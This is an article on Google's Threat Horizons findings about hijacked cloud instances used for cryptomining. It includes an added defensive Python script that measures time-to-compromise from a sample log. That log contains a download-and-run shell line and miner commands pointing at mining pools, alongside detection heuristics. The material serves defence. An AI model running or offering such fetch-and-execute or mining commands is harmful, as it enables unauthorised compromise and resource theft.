In cybersecurity, threats are like mosquitoes on a humid August evening: as soon as you knock one out, another one is already biting at your neck.
For end-users, threat intelligence is key to improving the configuration of environments and defenses, and that is something Google is hoping to make easier with its new Threat Horizons report.
The report was published by Google's Cybersecurity Action Team and is based on observations from its Threat Analysis Group (TAG) and other internal teams.
Google's stated goal is to provide "actionable intelligence that enables organizations to ensure their cloud environments are best protected against ever evolving threats."
This leads us to the first section of the report, which is dedicated to looking at how malicious actors use compromised Google Cloud instances for cryptocurrency mining.
Cryptocurrency mining has taken off in popularity in the last few years, for end-users and threat actors alike. And Google says you may be paying for cryptominers to use your cloud.
Of 50 recently compromised Google Cloud instances, 86% were used to perform cryptomining, according to the report. Additionally, 10% of the compromised instances were used to conduct scans of other publicly available resources to identify vulnerable systems, and 8% were used to attack other targets.
So how are malicious threat actors gaining access? Google provides the top five exploited vulnerabilities in cloud instances and how frequently they are exploited:
If attackers are attempting to use your compromised cloud instances for cryptomining, they can do so before you finish reading this story.
Researchers found that in 58% of these situations, the cryptomining software was downloaded within 22 seconds of being compromised. Google shares what this means:
"This suggests that the initial attacks and subsequent downloads were scripted events not requiring human intervention. The ability to manually intervene in these situations to prevent exploitation is nearly impossible. The best defense would be to not deploy a vulnerable system or have automated response mechanisms."
The report also says this:
"The shortest amount of time between deploying a vulnerable Cloud instance exposed to the Internet and its compromise was determined to be as little as 30 minutes. In 40% of instances the time to compromise was under eight hours. This suggests that the public IP address space is routinely scanned for vulnerable Cloud instances. It will not be a matter of if a vulnerable Cloud instance is detected, but rather when."
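The two quoted findings (mining software landing within 22 seconds of compromise in 58% of cases, and time-to-compromise often under eight hours) are the kind of numbers a defender can compute from their own instance event logs. The following Python script is an added example, not code from Google or the report: it parses a constructed JSON-lines event stream (the field names `ts`, `instance`, `event` and `detail` are assumptions, not any cloud provider's real audit schema), measures the gap between each instance's creation and its first cryptomining indicator, and flags gaps short enough to be scripted rather than hands-on. The indicator heuristics (the `stratum+tcp://` / `stratum+ssl://` pool URL scheme and a download piped straight into a shell) are assumed, defender-side rules, not a complete detection.

```python
"""Time-to-compromise triage over cloud instance event logs.

Added example, not from the Threat Horizons report. The log format and
field names below are assumptions; the sample log is constructed.
"""
import json
from datetime import datetime, timezone

# Assumed indicator heuristics: mining-pool URL scheme in a command line,
# and a remote script being downloaded and piped into a shell.
MINING_POOL_SCHEMES = ("stratum+tcp://", "stratum+ssl://")
DOWNLOADERS = ("curl", "wget")
SHELL_PIPES = ("| sh", "| bash")

# Constructed sample log: three instances, two show mining indicators.
SAMPLE_LOG = """\
{"ts": "2021-11-01T10:00:00Z", "instance": "vm-a", "event": "instance.create", "detail": ""}
{"ts": "2021-11-01T10:00:18Z", "instance": "vm-a", "event": "process.exec", "detail": "sh -c 'curl -s http://203.0.113.9/x.sh | sh'"}
{"ts": "2021-11-01T10:00:22Z", "instance": "vm-a", "event": "process.exec", "detail": "./miner -o stratum+tcp://pool.example:3333"}
{"ts": "2021-11-01T11:00:00Z", "instance": "vm-b", "event": "instance.create", "detail": ""}
{"ts": "2021-11-01T11:05:00Z", "instance": "vm-b", "event": "process.exec", "detail": "apt-get install -y nginx"}
{"ts": "2021-11-01T12:00:00Z", "instance": "vm-c", "event": "instance.create", "detail": ""}
{"ts": "2021-11-01T19:30:00Z", "instance": "vm-c", "event": "process.exec", "detail": "/tmp/kthreadd -o stratum+ssl://pool.example:443"}
"""


def parse_events(text):
    """Parse JSON-lines events into dicts with UTC datetimes, sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(
            tzinfo=timezone.utc
        )
        events.append(rec)
    return sorted(events, key=lambda r: r["ts"])


def is_mining_indicator(detail):
    """Return True if a command line matches one of the assumed indicators."""
    d = detail.lower()
    if any(scheme in d for scheme in MINING_POOL_SCHEMES):
        return True
    downloads = any(tool in d for tool in DOWNLOADERS)
    piped = any(pipe in d for pipe in SHELL_PIPES)
    return downloads and piped


def time_to_compromise(events, scripted_threshold_s=60):
    """Per instance: seconds from creation to first indicator, and whether
    that gap is short enough to look scripted (no human in the loop)."""
    created = {}
    findings = {}
    for rec in events:
        inst = rec["instance"]
        if rec["event"] == "instance.create":
            created[inst] = rec["ts"]
        elif (
            rec["event"] == "process.exec"
            and inst in created
            and inst not in findings
            and is_mining_indicator(rec["detail"])
        ):
            gap = (rec["ts"] - created[inst]).total_seconds()
            findings[inst] = {
                "seconds": gap,
                "scripted": gap <= scripted_threshold_s,
                "detail": rec["detail"],
            }
    return findings


def share_within(findings, seconds):
    """Fraction of compromised instances whose first indicator arrived
    within `seconds` of creation (the report's 22-second / 8-hour style metric)."""
    if not findings:
        return 0.0
    return sum(1 for f in findings.values() if f["seconds"] <= seconds) / len(findings)


if __name__ == "__main__":
    found = time_to_compromise(parse_events(SAMPLE_LOG))
    for inst, f in found.items():
        kind = "scripted" if f["scripted"] else "slower"
        print(f"{inst}: first indicator after {f['seconds']:.0f}s ({kind}): {f['detail']}")
    print(f"share within 22s: {share_within(found, 22):.0%}")
    print(f"share within 8h:  {share_within(found, 8 * 3600):.0%}")
```

On the constructed sample, `vm-a` shows an indicator 18 seconds after creation and is flagged as scripted, `vm-c` only after seven and a half hours, and `vm-b` is clean. The `scripted` flag is the practical takeaway from the quoted text: a compromise that completes in seconds cannot be answered by a human reading an alert, so the response to such a finding (quarantining the instance, revoking its service account, or tearing it down) has to be automated as well.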
On top of reminding end-users to follow best practices with simple things like using strong passwords, Google provides a list of recommendations and resources for people to follow in order to avoid their cloud being used for cryptomining.
These resources are: